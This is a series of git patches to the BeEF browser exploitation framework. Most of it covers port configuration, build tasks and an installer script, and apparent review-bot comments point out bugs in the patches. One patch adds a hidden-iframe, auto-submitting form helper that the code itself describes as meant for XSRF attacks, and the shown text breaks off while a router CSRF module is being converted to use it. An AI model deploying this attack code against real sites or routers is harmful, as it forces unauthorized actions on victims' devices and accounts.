From 3d2678212549a5d056290c79e0bde43e7c1c556e Mon Sep 17 00:00:00 2001
From: Nikolaos Anastopoulos
Date: Fri, 23 Mar 2012 15:09:46 +0200
Subject: [PATCH 01/21] Added public port setting to server configuration
---
config.yaml | 1 +
core/main/handlers/modules/beefjs.rb | 6 ++++++
core/main/server.rb | 5 ++++-
3 files changed, 11 insertions(+), 1 deletion(-)
diff --git a/config.yaml b/config.yaml
index 679d183f6..d01fd3649 100644
--- a/config.yaml
+++ b/config.yaml
@@ -32,6 +32,7 @@ beef:
port: "3000"
# if running behind a nat set the public ip address here
#public: ""
+ #public_port: ""
dns: "localhost"
panel_path: "/ui/panel"
hook_file: "/hook.js"
diff --git a/core/main/handlers/modules/beefjs.rb b/core/main/handlers/modules/beefjs.rb
index a43fc5674..054a047e1 100644
--- a/core/main/handlers/modules/beefjs.rb
+++ b/core/main/handlers/modules/beefjs.rb
@@ -48,6 +48,12 @@ module Modules
hook_session_config['beef_url'].sub!(/0\.0\.0\.0/, req_host)
end
+ # @note if http_port <> public_port in config ini, use the public_port
+ if hook_session_config['beef_port'] != hook_session_config['beef_public_port']
+ hook_session_config['beef_port'] = hook_session_config['beef_public_port']
+ hook_session_config['beef_url'].sub!(/#{hook_session_config['beef_port']}/, hook_session_config['beef_public_port'])
+ end
+
# @note populate place holders in the beefjs string and set the response body
eruby = Erubis::FastEruby.new(beefjs)
@body << eruby.evaluate(hook_session_config)
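Review bot: The `sub!` on the fourth added line can never rewrite the URL, because the line before it has already overwritten `hook_session_config['beef_port']` with the public port, so the regexp `/#{hook_session_config['beef_port']}/` is built from the public port and replaces it with itself while the listening port stays in `beef_url`. Swap the two statements so the URL is rewritten first, and anchor and escape the pattern so that a port such as `3000` cannot match an unrelated run of digits: `hook_session_config['beef_url'].sub!(/:#{Regexp.escape(hook_session_config['beef_port'])}\b/, ":#{hook_session_config['beef_public_port']}")` followed by `hook_session_config['beef_port'] = hook_session_config['beef_public_port']`. With `public_port` commented out in config.yaml the value read here is presumably nil, in which case the comparison is true and `sub!` is handed nil as the replacement, which raises. The same ordering defect is carried into the beefjs.rb hunks of PATCH 02/21 and PATCH 11/21. The enclosing method starts and ends outside this hunk.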
diff --git a/core/main/server.rb b/core/main/server.rb
index e47eb1fd1..b29a78665 100644
--- a/core/main/server.rb
+++ b/core/main/server.rb
@@ -29,7 +29,8 @@ module BeEF
def initialize
@configuration = BeEF::Core::Configuration.instance
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
- @url = "http://#{beef_host}:#{@configuration.get("beef.http.port")}"
+ beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
+ @url = "http://#{beef_host}:#{beef_port}"
@root_dir = File.expand_path('../../../', __FILE__)
@command_urls = {}
@mounts = {}
@@ -44,6 +45,8 @@ module BeEF
'beef_root_dir' => @root_dir,
'beef_host' => @configuration.get('beef.http.host'),
'beef_port' => @configuration.get('beef.http.port'),
+ 'beef_public' => @configuration.get('beef.http.public'),
+ 'beef_public_port' => @configuration.get('beef.http.public_port'),
'beef_dns' => @configuration.get('beef.http.dns'),
'beef_hook' => @configuration.get('beef.http.hook_file')
}
From e4d4edba7524e96d3f5ed0acf4431cc00b281b7b Mon Sep 17 00:00:00 2001
From: Nikolaos Anastopoulos
Date: Fri, 23 Mar 2012 20:42:12 +0200
Subject: [PATCH 02/21] Public port setting affects URI scheme
---
config.yaml | 2 +-
core/main/client/net.js | 2 +-
core/main/handlers/modules/beefjs.rb | 5 ++++-
3 files changed, 6 insertions(+), 3 deletions(-)
diff --git a/config.yaml b/config.yaml
index d01fd3649..21f5acc9e 100644
--- a/config.yaml
+++ b/config.yaml
@@ -32,7 +32,7 @@ beef:
port: "3000"
# if running behind a nat set the public ip address here
#public: ""
- #public_port: ""
+ #public_port: ""
dns: "localhost"
panel_path: "/ui/panel"
hook_file: "/hook.js"
diff --git a/core/main/client/net.js b/core/main/client/net.js
index b5340d472..0d1e97f45 100644
--- a/core/main/client/net.js
+++ b/core/main/client/net.js
@@ -124,7 +124,7 @@ beef.net = {
push: function(stream) {
//need to implement wait feature here eventually
for (var i = 0; i < stream.pc; i++) {
- this.request('http', 'GET', this.host, this.port, this.handler, null, stream.get_packet_data(), 10, 'text', null);
+ this.request(this.port == '443' ? 'https' : 'http', 'GET', this.host, this.port, this.handler, null, stream.get_packet_data(), 10, 'text', null);
}
},
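Review bot: The changed line infers the scheme from the port, so only a server answering on 443 is polled over https and any other TLS port (including a `public_port` set by the same series) still gets plain http, while 443 is itself not a guarantee of TLS. The same 443 rule is hard-coded again in beefjs.rb in this commit, so there are now two copies of a heuristic that should be one configuration value; carrying the scheme next to `this.host`/`this.port` (inferred: no such field is visible here) and calling `this.request(this.scheme, 'GET', ...)` would remove both. `push` starts and ends inside this hunk.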
diff --git a/core/main/handlers/modules/beefjs.rb b/core/main/handlers/modules/beefjs.rb
index 054a047e1..0d9572a99 100644
--- a/core/main/handlers/modules/beefjs.rb
+++ b/core/main/handlers/modules/beefjs.rb
@@ -51,7 +51,10 @@ module Modules
# @note if http_port <> public_port in config ini, use the public_port
if hook_session_config['beef_port'] != hook_session_config['beef_public_port']
hook_session_config['beef_port'] = hook_session_config['beef_public_port']
- hook_session_config['beef_url'].sub!(/#{hook_session_config['beef_port']}/, hook_session_config['beef_public_port'])
+ hook_session_config['beef_url'].sub!(/#{hook_session_config['beef_port']}/, hook_session_config['beef_public_port'])
+ if hook_session_config['beef_public_port'] == '443'
+ hook_session_config['beef_url'].sub!(/http:/, 'https:')
+ end
end
# @note populate place holders in the beefjs string and set the response body
From dc269b15b14435eca710b741da717eab184fe681 Mon Sep 17 00:00:00 2001
From: Wade Alcorn
Date: Mon, 30 Apr 2012 15:10:54 +1000
Subject: [PATCH 03/21] Version updated
---
VERSION | 2 +-
config.yaml | 2 +-
2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/VERSION b/VERSION
index aafd485c3..509c304b2 100644
--- a/VERSION
+++ b/VERSION
@@ -14,4 +14,4 @@
# limitations under the License.
#
-0.4.3.4-alpha
+0.4.3.5-alpha
diff --git a/config.yaml b/config.yaml
index 669bb5bdd..7159582be 100644
--- a/config.yaml
+++ b/config.yaml
@@ -16,7 +16,7 @@
# BeEF Configuration file
beef:
- version: '0.4.3.4-alpha'
+ version: '0.4.3.5-alpha'
debug: false
restrictions:
From 53c6fb5252fde1fcb07760432a7f4c7d4294dce8 Mon Sep 17 00:00:00 2001
From: bcoles
Date: Thu, 3 May 2012 15:32:53 +0930
Subject: [PATCH 04/21] Fixed typo in module name/category
---
modules/hooked_domain/ajax_fingerprint/config.yaml | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/modules/hooked_domain/ajax_fingerprint/config.yaml b/modules/hooked_domain/ajax_fingerprint/config.yaml
index 32e2c3156..b1cd1b6ce 100644
--- a/modules/hooked_domain/ajax_fingerprint/config.yaml
+++ b/modules/hooked_domain/ajax_fingerprint/config.yaml
@@ -17,8 +17,8 @@ beef:
module:
ajax_fingerprint:
enable: true
- category: "Host"
- name: "Hooked Domain"
+ category: "Hooked Domain"
+ name: "Fingerprint Ajax"
description: "Fingerprint Ajax and JS libraries present on the hooked page."
authors: ["qswain"]
target:
From 99d47351b7b13f3a19986295bc4b6aff4f290450 Mon Sep 17 00:00:00 2001
From: bcoles
Date: Thu, 3 May 2012 15:54:46 +0930
Subject: [PATCH 05/21] Patched newline issue in request() in net.js
See commit c3435ee345bcf77da4bb1cf6035d0103e5655f63 for more info
---
core/main/client/net.js | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/core/main/client/net.js b/core/main/client/net.js
index b4dd6f590..889503569 100644
--- a/core/main/client/net.js
+++ b/core/main/client/net.js
@@ -146,7 +146,7 @@ beef.net = {
request: function(scheme, method, domain, port, path, anchor, data, timeout, dataType, callback) {
//check if same domain or cross domain
var cross_domain = true;
- if (document.domain == domain){
+ if (document.domain == domain.replace(/(\r\n|\n|\r)/gm,"")) { //strip eventual line breaks
if(document.location.port == "" || document.location.port == null){
cross_domain = !(port == "80" || port == "443");
}
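Review bot: The newline-stripped value is computed only inside the comparison on the changed line, so `domain` itself still carries the line break when `request` goes on to use it for the actual request (the rest of the body is outside this hunk, so that part is inferred). Normalise once at the top of the function, `domain = domain.replace(/[\r\n]+/g, '');` before `var cross_domain = true;`, and keep the comparison as `document.domain == domain`; the character class also replaces the three-alternative regexp. `request` continues past the end of this hunk.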
From 1cf980f06ec8536828f8485ad1b74e24218bb5ad Mon Sep 17 00:00:00 2001
From: Ben Waugh
Date: Fri, 4 May 2012 07:21:57 +1000
Subject: [PATCH 06/21] Added CDE Task to Rakefile
Initial CDE Generator script, will clone latest CDE package, make, then
create beef cde Package
---
Rakefile | 19 +++++++++++++++++++
1 file changed, 19 insertions(+)
diff --git a/Rakefile b/Rakefile
index 06b2dc27a..e06ddf1e1 100644
--- a/Rakefile
+++ b/Rakefile
@@ -152,3 +152,22 @@ task :dmg do
puts "\nBeEF.dmg created\n"
end
+
+################################
+# Create CDE Package
+# This will download and make the CDE Executable and
+# gnereate a CDE Package in cde-package
+
+task :cde do
+ puts "\nCloning and Making CDE...";
+ sh "git clone git://github.com/pgbovine/CDE.git";
+ Dir.chdir "CDE";
+ sh "make";
+ Dir.chdir "..";
+ puts "\nCreating CDE Package...\n";
+ sh "./CDE/cde ruby beef";
+ sleep (1)
+ puts "\nCleaning Up...\n";
+ sh "rm -r CDE";
+ puts "\nCDE Package Created…\n";
+
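Review bot: The block opened by `task :cde do` is never closed, so this Rakefile does not parse until the `end` arrives in PATCH 08/21. The build tool is fetched with `git clone git://github.com/pgbovine/CDE.git` over the unauthenticated git:// transport at whatever HEAD happens to be, so the package is built from code nobody verified and the result is not reproducible; use the https URL and check out a fixed revision, e.g. `Dir.chdir("CDE") { sh "git checkout <PINNED-COMMIT>"; sh "make" }` with the revision recorded in the Rakefile. That block form of `Dir.chdir` also restores the working directory when `make` fails, which the paired `Dir.chdir "CDE"` / `Dir.chdir ".."` does not. `sh "rm -r CDE"` is `rm_rf "CDE"` in Rake, and the trailing semicolons and `sleep (1)` are not Ruby style.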
From f566a00fdf9239a5c030b1406ca4cfb669540f7b Mon Sep 17 00:00:00 2001
From: Ben Waugh
Date: Fri, 4 May 2012 08:09:58 +1000
Subject: [PATCH 07/21] fix to cde script
removed non-ascii char
---
Rakefile | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/Rakefile b/Rakefile
index e06ddf1e1..6c8ff7d91 100644
--- a/Rakefile
+++ b/Rakefile
@@ -169,5 +169,5 @@ task :cde do
sleep (1)
puts "\nCleaning Up...\n";
sh "rm -r CDE";
- puts "\nCDE Package Created…\n";
+ puts "\nCDE Package Created...\n";
From e3e4a44ae7ad6cfd195dd1e611619e6c46c29275 Mon Sep 17 00:00:00 2001
From: Ben Waugh
Date: Fri, 4 May 2012 09:41:12 +1000
Subject: [PATCH 08/21] Bug Fixes for CDE Task
---
Rakefile | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/Rakefile b/Rakefile
index 6c8ff7d91..4e736b699 100644
--- a/Rakefile
+++ b/Rakefile
@@ -166,8 +166,9 @@ task :cde do
Dir.chdir "..";
puts "\nCreating CDE Package...\n";
sh "./CDE/cde ruby beef";
- sleep (1)
+ sleep (1);
puts "\nCleaning Up...\n";
sh "rm -r CDE";
puts "\nCDE Package Created...\n";
+ end
From e88be791342138a6fff04ad4bc90722faa6dbf0f Mon Sep 17 00:00:00 2001
From: Wade Alcorn
Date: Sun, 6 May 2012 06:11:44 +1000
Subject: [PATCH 09/21] Updated demo page
---
extensions/demos/html/basic.html | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/extensions/demos/html/basic.html b/extensions/demos/html/basic.html
index 57cc03802..f058afc95 100644
--- a/extensions/demos/html/basic.html
+++ b/extensions/demos/html/basic.html
@@ -15,12 +15,12 @@
- These links are for demonstrating the "collect links" command module
+ These links are for demonstrating the "Get Page HREFs" command module
From 6383f8670b7ae837c2e40397b78a2c5761584faf Mon Sep 17 00:00:00 2001
From: Ben Waugh
Date: Sun, 6 May 2012 11:46:22 +1000
Subject: [PATCH 10/21] Install Script
Script to install prerequisites for OSX/Debian/RHEL, download latest
Beef script, install required gems and start beef
---
install-beef | 147 +++++++++++++++++++++++++++++++++++++++++++++++++++
1 file changed, 147 insertions(+)
create mode 100644 install-beef
diff --git a/install-beef b/install-beef
new file mode 100644
index 000000000..2c2401b20
--- /dev/null
+++ b/install-beef
@@ -0,0 +1,147 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+
+clear
+echo "======================================"
+echo " BeEF Installer "
+echo "======================================"
+echo ""
+echo "Detecting OS..";
+
+
+OS=`uname`
+
+if [ "${OS}" = "Linux" ] ; then
+ if [ -f /etc/redhat-release ] ; then
+ Distro='RedHat'
+ elif [ -f /etc/debian_version ] ; then
+ Distro='Debian'
+ fi
+ readonly OS
+ readonly Distro
+fi
+
+if [ "$OS" == "Darwin" ]; then
+ echo "Mac OSX Detected"
+ echo "Installing Ruby Version Manager (RVM) & Ruby 1.9.3.."
+ bash -s stable < <(curl -s https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer)
+ source ~/.bash_login
+ rvm install 1.9.3-p0 --with-gcc=clang
+ rvm use 1.9.3-p0
+ echo ""
+ echo "Downloading BeEF.."
+
+ git clone git://github.com/beefproject/beef.git
+ cd beef
+
+ echo ""
+ echo "Installing Ruby Gems.."
+ bundle install
+ OK="yes"
+
+ cd beef
+ ./beef
+
+ echo ""
+ echo "=========================================="
+ echo " Install Complete"
+ echo "Please restart Terminal and Run BeEF with:"
+ echo " $ ./beef "
+ echo "=========================================="
+ echo ""
+
+fi
+
+if [ "$Distro" == "Debian" ]; then
+ echo "Debian/Ubuntu Detected"
+ echo "Installing Prerequisite Packages.."
+ sudo apt-get update
+ sudo apt-get install ruby1.9.1-dev build-essential libsqlite3-ruby libsqlite3-dev build-essential libsqlite3-ruby git libsqlite3-dev rake
+
+ echo "Downloading BeEF.."
+ git clone git://github.com/beefproject/beef.git
+ cd beef
+
+ echo "Installing Ruby Gems"
+ sudo gem install bundler
+ sudo bundle install
+
+ cd beef
+ ./beef
+
+ OK="yes"
+ echo ""
+ echo "=========================================="
+ echo " Install Complete"
+ echo "=========================================="
+ echo ""
+fi
+
+
+if [ "$Distro" == "RedHat" ]; then
+ echo "Redhat/Fedora Detected"
+ echo "Installing Prerequisite Packages.."
+ sudo yum install -y git make gcc openssl-devel gcc-c++ patch readline readline-devel zlib zlib-devel libyaml-devel libffi-devel bzip2 autoconf automake libtool bison iconv-devel sqlite-devel
+
+ echo ""
+ echo "Installing Ruby Version Manager (RVM) & Ruby 1.9.2"
+ wget https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer
+ bash ./rvm-installer
+ source ~/.rvm/scripts/rvm
+ rvm pkg install openssl
+ rvm install 1.9.2 --with-openssl-dir=$rvm_path/usr
+ source ~/.rvm/scripts/rvm
+ rvm use 1.9.2 --default
+
+ echo "Downloading BeEF.."
+ git clone git://github.com/beefproject/beef.git
+ cd beef
+
+ gem install bundler
+ bundle
+
+ source ~/.bash_profile
+
+ cd beef
+ ./beef
+
+ OK="yes"
+ echo ""
+ echo "=========================================="
+ echo " Install Complete"
+ echo "=========================================="
+ echo ""
+
+fi
+
+if [ "$OK" == "yes" ]; then
+
+else
+ echo ""
+ echo "======================================="
+ echo " Install Failed"
+ echo "Unable to locate installer for your OS:"
+ echo $OS
+ echo $Distro
+ echo "======================================="
+ echo ""
+fi
+
+
+
+
+
+
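Review bot: `if [ "$OK" == "yes" ]; then` followed directly by `else` has an empty then-branch, which is a syntax error in both sh and bash, so the script dies at that point; invert it to `if [ "$OK" != "yes" ]; then` and drop the `else`. Each OS branch does `cd beef` right after the clone and then `cd beef` again before `./beef`, the second of which can only fail, and `OK="yes"` is set regardless of whether any of the preceding `rvm`, `apt-get`, `yum`, `git clone` or `bundle` steps succeeded, so the failure message can never be reached on a supported OS. The file has no shebang although it relies on bash-only `==` and `< <(...)`, so it needs `#!/usr/bin/env bash` plus `set -e` if the unchecked commands are to stay unchecked. The OSX and RedHat branches fetch the RVM installer from a moving GitHub branch over HTTPS and pipe it straight into bash with no pinned revision or checksum, which is the weakest link in this installer from a supply-chain point of view; pin the installer to a released version and verify it before executing.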
From a62b77cc1d6df34bfb6df689f81cda848386671a Mon Sep 17 00:00:00 2001
From: bcoles
Date: Mon, 7 May 2012 18:26:27 +0930
Subject: [PATCH 11/21] Updated introduction of public port settings
These settings are experimental
---
config.yaml | 2 +-
core/main/console/banners.rb | 1 +
core/main/handlers/modules/beefjs.rb | 12 +++++++-----
modules/debug/test_network_request/module.rb | 2 +-
modules/phonegap/phonegap_persistence/module.rb | 2 +-
5 files changed, 11 insertions(+), 8 deletions(-)
diff --git a/config.yaml b/config.yaml
index 30b5e3a40..d14c27e09 100644
--- a/config.yaml
+++ b/config.yaml
@@ -32,7 +32,7 @@ beef:
port: "3000"
# if running behind a nat set the public ip address here
#public: ""
- #public_port: ""
+ #public_port: "" # port setting is experimental
dns: "localhost"
panel_path: "/ui/panel"
hook_file: "/hook.js"
diff --git a/core/main/console/banners.rb b/core/main/console/banners.rb
index 40d52b825..3621d20e9 100644
--- a/core/main/console/banners.rb
+++ b/core/main/console/banners.rb
@@ -92,6 +92,7 @@ module Banners
self.interfaces.map do |host| # display the important URLs on each interface from the interfaces array
print_success "running on network interface: #{host}"
+ beef_host = configuration.get("beef.http.public_port") || configuration.get("beef.http.port")
data = "Hook URL: http://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.hook_file")}\n"
data += "UI URL: http://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.panel_path")}\n"
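Review bot: The variable added on the third line of the hunk is named `beef_host` but holds a port, and it is never used: both `data` lines below still interpolate `configuration.get("beef.http.port")`, so the banner keeps printing the internal port even when `public_port` is set, which is what the commit message says it introduces. Rename it `beef_port = configuration.get("beef.http.public_port") || configuration.get("beef.http.port")` and use `#{beef_port}` in both URL strings. The enclosing `map` block continues outside this hunk.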
diff --git a/core/main/handlers/modules/beefjs.rb b/core/main/handlers/modules/beefjs.rb
index 0d9572a99..f5078bf98 100644
--- a/core/main/handlers/modules/beefjs.rb
+++ b/core/main/handlers/modules/beefjs.rb
@@ -49,11 +49,13 @@ module Modules
end
# @note if http_port <> public_port in config ini, use the public_port
- if hook_session_config['beef_port'] != hook_session_config['beef_public_port']
- hook_session_config['beef_port'] = hook_session_config['beef_public_port']
- hook_session_config['beef_url'].sub!(/#{hook_session_config['beef_port']}/, hook_session_config['beef_public_port'])
- if hook_session_config['beef_public_port'] == '443'
- hook_session_config['beef_url'].sub!(/http:/, 'https:')
+ unless hook_session_config['beef_public_port'].nil?
+ if hook_session_config['beef_port'] != hook_session_config['beef_public_port']
+ hook_session_config['beef_port'] = hook_session_config['beef_public_port']
+ hook_session_config['beef_url'].sub!(/#{hook_session_config['beef_port']}/, hook_session_config['beef_public_port'])
+ if hook_session_config['beef_public_port'] == '443'
+ hook_session_config['beef_url'].sub!(/http:/, 'https:')
+ end
end
end
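Review bot: The new `unless hook_session_config['beef_public_port'].nil?` guard does not cover the empty string, and the sample the same commit ships in config.yaml is `public_port: ""`, so an operator who uncomments it as-is gets `"" != "3000"` and `beef_port` set to `""`, leaving the template with an empty port. Guard on emptiness instead: `public_port = hook_session_config['beef_public_port']` then `unless public_port.nil? || public_port.empty?`. The assignment on the following line still clobbers the port the regexp on the next line is built from, so the URL rewrite remains a no-op as noted on PATCH 01/21. The enclosing method starts and ends outside this hunk.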
diff --git a/modules/debug/test_network_request/module.rb b/modules/debug/test_network_request/module.rb
index e649dbdaa..e4de490dd 100644
--- a/modules/debug/test_network_request/module.rb
+++ b/modules/debug/test_network_request/module.rb
@@ -24,7 +24,7 @@ class Test_network_request < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
- beef_port = @configuration.get("beef.http.port")
+ beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
return [
{'name' => 'scheme', 'ui_label'=>'Scheme', 'type' => 'text', 'width' => '400px', 'value' => 'http' },
diff --git a/modules/phonegap/phonegap_persistence/module.rb b/modules/phonegap/phonegap_persistence/module.rb
index 909014fe2..30face23d 100644
--- a/modules/phonegap/phonegap_persistence/module.rb
+++ b/modules/phonegap/phonegap_persistence/module.rb
@@ -22,7 +22,7 @@ class Phonegap_persistence < BeEF::Core::Command
@configuration = BeEF::Core::Configuration.instance
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
- beef_port = @configuration.get("beef.http.port")
+ beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
return [{
'name' => 'hook_url',
From 6f293ba8661bf37a68fe0f36c42b39d16650b57e Mon Sep 17 00:00:00 2001
From: antisnatchor
Date: Tue, 8 May 2012 16:33:10 +0100
Subject: [PATCH 12/21] Added dynamic module loading in the configuration
object
---
core/main/configuration.rb | 4 +++-
1 file changed, 3 insertions(+), 1 deletion(-)
diff --git a/core/main/configuration.rb b/core/main/configuration.rb
index c6d7de06f..f2469e0f4 100644
--- a/core/main/configuration.rb
+++ b/core/main/configuration.rb
@@ -118,7 +118,9 @@ module BeEF
# Load module configurations
def load_modules_config
self.set('beef.module', {})
- Dir.glob("#{$root_dir}/modules/**/*/config.yaml") do | cf |
+ # support nested sub-categories, like browser/hooked_domain/ajax_fingerprint
+ module_configs = File.join("#{$root_dir}/modules/**", "config.yaml")
+ Dir.glob(module_configs) do | cf |
y = self.load(cf)
if y != nil
y['beef']['module'][y['beef']['module'].keys.first]['path'] = cf.gsub(/config\.yaml/, '').gsub(/#{$root_dir}\//, '')
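Review bot: Style: the added `File.join("#{$root_dir}/modules/**", "config.yaml")` mixes string interpolation with `File.join`; `module_configs = File.join($root_dir, 'modules', '**', 'config.yaml')` lets `File.join` own every separator and reads as one path. Note that `**/config.yaml` also matches a `config.yaml` placed directly under `modules/`, which the old `**/*/config.yaml` pattern did not; if that is unintended, keep the intermediate `*`. `load_modules_config` continues past the end of this hunk.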
From ff0dd7e9e2ddcfd0e8311ecb395a61d8f2a4a109 Mon Sep 17 00:00:00 2001
From: Ben Waugh
Date: Wed, 9 May 2012 11:40:35 +1000
Subject: [PATCH 13/21] Undated Installed to include disclaimer and exit option
---
install-beef | 10 ++++++++++
1 file changed, 10 insertions(+)
diff --git a/install-beef b/install-beef
index 2c2401b20..4da7c9bc1 100644
--- a/install-beef
+++ b/install-beef
@@ -19,6 +19,16 @@ echo "======================================"
echo " BeEF Installer "
echo "======================================"
echo ""
+echo "CAUTION: This installation script will install a number of BeEF dependencies including the Ruby-RVM environment and it's dependencies."
+echo ""
+echo "In rare cases, this may lead to unexpected behaviour or package conflicts on some systems."
+echo ""
+
+read -p "Are you sure you wish to continue (Y/n)? "
+if [ "`echo ${REPLY} | tr [:upper:] [:lower:]`" == "n" ] ; then
+ exit;
+fi
+
echo "Detecting OS..";
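Review bot: In the added prompt check `tr [:upper:] [:lower:]` the class names are unquoted, so the shell treats each as a glob bracket expression; a one-character file named `u`, `p`, `e`, `r`, `l`, `o`, `w` or `:` in the current directory replaces the argument, `tr` then misbehaves, and the `if` silently falls through to continue installing. Quote them, `tr '[:upper:]' '[:lower:]'`, or drop the subshell with `case "${REPLY}" in [Nn]*) exit ;; esac`. `read -p` and `==` are bash-only, consistent with the rest of the script, but the file still has no `#!/usr/bin/env bash` line. The same lines are re-added unchanged in PATCH 15/21.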
From 13c75e87c95c93941f296c88346397ad7c74514a Mon Sep 17 00:00:00 2001
From: Ben Waugh
Date: Wed, 9 May 2012 11:42:26 +1000
Subject: [PATCH 14/21] Revert "Undated Installed to include disclaimer and
exit option"
This reverts commit ff0dd7e9e2ddcfd0e8311ecb395a61d8f2a4a109.
---
install-beef | 10 ----------
1 file changed, 10 deletions(-)
diff --git a/install-beef b/install-beef
index 4da7c9bc1..2c2401b20 100644
--- a/install-beef
+++ b/install-beef
@@ -19,16 +19,6 @@ echo "======================================"
echo " BeEF Installer "
echo "======================================"
echo ""
-echo "CAUTION: This installation script will install a number of BeEF dependencies including the Ruby-RVM environment and it's dependencies."
-echo ""
-echo "In rare cases, this may lead to unexpected behaviour or package conflicts on some systems."
-echo ""
-
-read -p "Are you sure you wish to continue (Y/n)? "
-if [ "`echo ${REPLY} | tr [:upper:] [:lower:]`" == "n" ] ; then
- exit;
-fi
-
echo "Detecting OS..";
From 70f70a339f2d8e2f32c877d64e7ecfa01656c9e4 Mon Sep 17 00:00:00 2001
From: Ben Waugh
Date: Wed, 9 May 2012 11:42:30 +1000
Subject: [PATCH 15/21] Revert "Revert "Undated Installed to include disclaimer
and exit option""
This reverts commit 13c75e87c95c93941f296c88346397ad7c74514a.
---
install-beef | 10 ++++++++++
1 file changed, 10 insertions(+)
diff --git a/install-beef b/install-beef
index 2c2401b20..4da7c9bc1 100644
--- a/install-beef
+++ b/install-beef
@@ -19,6 +19,16 @@ echo "======================================"
echo " BeEF Installer "
echo "======================================"
echo ""
+echo "CAUTION: This installation script will install a number of BeEF dependencies including the Ruby-RVM environment and it's dependencies."
+echo ""
+echo "In rare cases, this may lead to unexpected behaviour or package conflicts on some systems."
+echo ""
+
+read -p "Are you sure you wish to continue (Y/n)? "
+if [ "`echo ${REPLY} | tr [:upper:] [:lower:]`" == "n" ] ; then
+ exit;
+fi
+
echo "Detecting OS..";
From 95cc1ac2d65a07ca93f76af1a9106e32d08c3f5f Mon Sep 17 00:00:00 2001
From: Ben Waugh
Date: Wed, 9 May 2012 11:42:32 +1000
Subject: [PATCH 16/21] Revert "Revert "Revert "Undated Installed to include
disclaimer and exit option"""
This reverts commit 70f70a339f2d8e2f32c877d64e7ecfa01656c9e4.
---
install-beef | 10 ----------
1 file changed, 10 deletions(-)
diff --git a/install-beef b/install-beef
index 4da7c9bc1..2c2401b20 100644
--- a/install-beef
+++ b/install-beef
@@ -19,16 +19,6 @@ echo "======================================"
echo " BeEF Installer "
echo "======================================"
echo ""
-echo "CAUTION: This installation script will install a number of BeEF dependencies including the Ruby-RVM environment and it's dependencies."
-echo ""
-echo "In rare cases, this may lead to unexpected behaviour or package conflicts on some systems."
-echo ""
-
-read -p "Are you sure you wish to continue (Y/n)? "
-if [ "`echo ${REPLY} | tr [:upper:] [:lower:]`" == "n" ] ; then
- exit;
-fi
-
echo "Detecting OS..";
From e426b3fb133cf3465936ec3141b5b8fc7e05d122 Mon Sep 17 00:00:00 2001
From: antisnatchor
Date: Wed, 9 May 2012 14:07:13 +0100
Subject: [PATCH 17/21] Added iframe XSRF form in beef.dom (Fixes issue 104)
---
core/main/client/dom.js | 31 +++++++++++++++++++++++++++++--
1 file changed, 29 insertions(+), 2 deletions(-)
diff --git a/core/main/client/dom.js b/core/main/client/dom.js
index c27f3bb2b..387b514bf 100644
--- a/core/main/client/dom.js
+++ b/core/main/client/dom.js
@@ -286,10 +286,37 @@ beef.dom = {
*/
detachApplet: function(id) {
$j('#' + id + '').detach();
+ },
+
+ /**
+ * Create an invisible iFrame with a form inside, and submit it. Useful for XSRF attacks delivered via POST requests.
+ * @params: {String} action: the form action attribute, where the request will be sent.
+ * @params: {String} method: HTTP method, usually POST.
+ * @params: {Array} inputs: an array of inputs to be added to the form (type, name, value).
+ * example: [{'type':'hidden', 'name':'1', 'value':''} , {'type':'hidden', 'name':'2', 'value':'3'}]
+ */
+ createIframeXsrfForm: function(action, method, inputs){
+ var iframeXsrf = beef.dom.createInvisibleIframe();
+
+ var formXsrf = document.createElement('form');
+ formXsrf.setAttribute('action', action);
+ formXsrf.setAttribute('method', method);
+
+ var input = null;
+ for (i in inputs){
+ var attributes = inputs[i];
+ input = document.createElement('input');
+ for(key in attributes){
+ input.setAttribute(key, attributes[key]);
+ }
+ formXsrf.appendChild(input);
+ }
+ iframeXsrf.contentWindow.document.body.appendChild(formXsrf);
+ formXsrf.submit();
+
+ return iframeXsrf;
}
-
-
};
beef.regCmp('beef.dom');
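Review bot: Both loops in the new `createIframeXsrfForm` use undeclared loop variables (`for (i in inputs)`, `for(key in attributes)`), so `i` and `key` become globals in the page the hook runs in and can collide with page variables, and `for…in` over an array also walks any enumerable properties a page script has added to `Array.prototype`, yielding a bogus extra `<input>`. Use `for (var i = 0; i < inputs.length; i++)` for the array and `for (var key in attributes)` with an `attributes.hasOwnProperty(key)` check for the object. The doc comment uses `@params:`, which JSDoc does not recognise; the tag is `@param {String} action …` and so on for the other two. The method is added inside the `beef.dom` object literal, whose start is outside this hunk.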
From 4faf75f1f1112bfb24189bdd36bb83a053ac8de6 Mon Sep 17 00:00:00 2001
From: antisnatchor
Date: Wed, 9 May 2012 14:20:12 +0100
Subject: [PATCH 18/21] Updated bt_home_hub_xsrf to use the new
beef.dom.createIframeXsrfForm JS api
---
modules/router/bt_home_hub_csrf/command.js | 31 +++-------------------
1 file changed, 4 insertions(+), 27 deletions(-)
diff --git a/modules/router/bt_home_hub_csrf/command.js b/modules/router/bt_home_hub_csrf/command.js
index 1537d8d09..d20374dbe 100644
--- a/modules/router/bt_home_hub_csrf/command.js
+++ b/modules/router/bt_home_hub_csrf/command.js
